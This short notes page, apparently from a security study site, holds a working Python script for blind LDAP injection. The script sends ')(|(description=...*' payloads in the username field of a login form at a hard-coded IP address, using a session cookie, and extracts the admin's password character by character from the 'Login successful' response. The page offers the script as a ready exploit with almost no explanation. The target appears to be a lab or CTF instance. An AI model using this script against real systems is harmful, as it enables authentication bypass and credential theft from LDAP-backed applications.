LDAP Data exfil
LDAP - LDAP injection - Authentication bypass - Brute force
import requests
import string
url = "http://94.237.50.242:31867"
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "PHPSESSID=b2feampt7epd0bfb0lqmtl7i9h"
}
success_msg = "Login successful"
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$%^&*()-_=+[]{}|;:'\",.<>?/\\`~"
password = ""
max_length = 50
for position in range(1, max_length + 1):
for char in alphabet:
payload = f")(|(description={password}{char}*"
# Post request
data = f"username=admin{payload}&password=invalid)"
x = requests.post(url, data, headers=headers)
# Check for success message
if success_msg in x.text:
password += char
print(f"Current password: {password}")
break
# No match means complete
else:
break
print(f"Password: {password}")
Last updated
Was this helpful?